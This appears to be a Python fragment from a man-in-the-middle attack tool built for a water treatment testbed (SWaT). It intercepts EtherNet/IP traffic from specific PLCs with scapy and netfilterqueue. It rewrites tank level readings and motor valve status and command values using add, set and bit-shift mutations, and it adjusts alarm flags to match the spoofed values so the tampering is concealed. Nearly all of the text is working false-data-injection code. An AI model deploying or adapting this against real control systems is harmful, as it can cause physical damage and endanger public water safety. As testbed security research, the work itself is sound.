def produce(): while True: if off: print('putting -1') q.put(-1) return # craft a packet i = 1 pkt = IP() / TCP() # pkt.src = i * 100 # pkt.dst = i * 200 # if you modify something, call show2 to recalculate everything pkt.show2() q.put(pkt) sleep(.5)
def __extract(packet): global mutation global value global device # global src # global dst pkt = IP(packet.get_payload()) if 'LIT' in device: #LIT mutation if (str(pkt.src) == '192.168.1.30' and enip_tcp.ENIP_SendRRData in pkt and str(pkt.dst) == '192.168.1.10'): ind = device.index('LIT') mut = mutation[ind] val = value[ind] if SWAT_LIT in pkt: true_value_tank = inthexToHex(pkt[SWAT_LIT].Pv) if mut in ('ASD','ALD','ARD'): mutate_value_tank = true_value_tank + val elif mut in ('STZ','STO','STS'): mutate_value_tank = val elif mut == 'BSL': shift = rol(pkt[SWAT_LIT].Pv,val,32) mutate_value_tank = inthexToHex(shift) elif mut == 'BSR': shift = ror(pkt[SWAT_LIT].Pv,val,32) mutate_value_tank = inthexToHex(shift) pkt[SWAT_LIT].Pv = hexTointhex(mutate_value_tank) pkt[SWAT_LIT].Sim_Pv = hexTointhex(mutate_value_tank) # set correct alarms for mutated value if int(float(mutate_value_tank)) < 250: pkt[SWAT_LIT].control = 1 pkt[SWAT_LIT].AHH = 0 pkt[SWAT_LIT].AH = 0 pkt[SWAT_LIT].AL = 1 pkt[SWAT_LIT].ALL = 1 elif int(float(mutate_value_tank)) < 800: pkt[SWAT_LIT].control = 1 pkt[SWAT_LIT].AHH = 0 pkt[SWAT_LIT].AH = 0 pkt[SWAT_LIT].AL = 1 pkt[SWAT_LIT].ALL = 0 elif int(float(mutate_value_tank)) > 1200: pkt[SWAT_LIT].control = 1 pkt[SWAT_LIT].AHH = 1 pkt[SWAT_LIT].AH = 1 pkt[SWAT_LIT].AL = 0 pkt[SWAT_LIT].ALL = 0 elif int(float(mutate_value_tank)) > 1000: pkt[SWAT_LIT].control = 1 pkt[SWAT_LIT].AHH = 0 pkt[SWAT_LIT].AH = 1 pkt[SWAT_LIT].AL = 0 pkt[SWAT_LIT].ALL = 0 del pkt[TCP].chksum # Need to recompute checksum del pkt[IP].chksum pkt.show2() packet.set_payload(str(pkt)) #manipulated packet spoofed_measurement = inthexToHex(pkt[SWAT_LIT].Sim_Pv) print('Changed packet from LIT %1.4f to %1.4f ' % (true_value_tank,spoofed_measurement)) print ("PKT from %s to %s" %(pkt.src,pkt.dst)) if 'MV' in device: # MV Mutation if (str(pkt.src) == '192.168.1.20' and enip_tcp.ENIP_SendRRData in pkt and str(pkt.dst) == '192.168.1.10'): ind = device.index('MV') mut = mutation[ind] val = value[ind] if SWAT_MV in pkt: true_value_motor = pkt[SWAT_MV].status if mut in ('ASD','ALD','ARD'): mutate_value_motor = true_value_motor + val if mutate_value_motor > 255: mutate_value_motor = 255 elif mutate_value_motor < 0: mutate_value_motor = 0 elif mut in ('STZ','STO','STS'): mutate_value_motor = val if mutate_value_motor > 255: mutate_value_motor = 255 elif mutate_value_motor < 0: mutate_value_motor = 0 elif mut == 'BSL': shift = rol(pkt[SWAT_MV].status,val,8) mutate_value_motor = shift elif mut == 'BSR': shift = ror(pkt[SWAT_MV].status,val,8) mutate_value_motor = shift pkt[SWAT_MV].status = mutate_value_motor pkt[SWAT_MV].cmd = mutate_value_motor del pkt[TCP].chksum # Need to recompute checksum del pkt[IP].chksum pkt.show2() packet.set_payload(str(pkt)) #manipulated packet spoofed_measurement = pkt[SWAT_MV].status print('Changed packet from MV %1.4f to %1.4f ' % (true_value_motor,spoofed_measurement)) print ("packet from %s to %s" %(pkt.src,pkt.dst)) # then, let the netfilterqueue forward the packet packet.accept()